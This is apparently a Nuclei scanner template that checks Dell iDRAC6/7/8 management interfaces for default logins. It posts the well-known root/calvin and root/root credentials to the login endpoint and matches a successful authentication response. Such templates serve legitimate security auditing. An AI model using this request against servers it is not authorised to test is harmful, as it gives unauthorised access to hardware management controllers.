id: dell-idrac-default-login

info:
  name: Dell iDRAC6/7/8 Default Login
  author: kophjager007,megamansec
  severity: high
  description: Dell iDRAC6/7/8 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
  reference:
    - https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner
  classification:
    cwe-id: CWE-798
  metadata:
    max-request: 2
  tags: dell,idrac,default-login

http:
  - raw:
      - |
        POST /data/login HTTP/1.1
        Host: {{Hostname}}

        user={{username}}&password={{password}}

    payloads:
      username:
        - root
      password:
        - calvin
        - root
    attack: clusterbomb

    headers:
      Content-Type: "application/x-www-form-urlencode"
      Referer: "{{BaseURL}}/login.html"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '<authResult>0</authResult>'
# digest: 4b0a00483046022100d93e37d962ff3568eef328f11c180c4c7e4a3e3003a18d78311d61c377e9979f022100c719e24f118a9b0412b7099190a9a43b8e77eaed8ebda4032cceac73754291cc:922c64590222798bb761d5b6d8e72950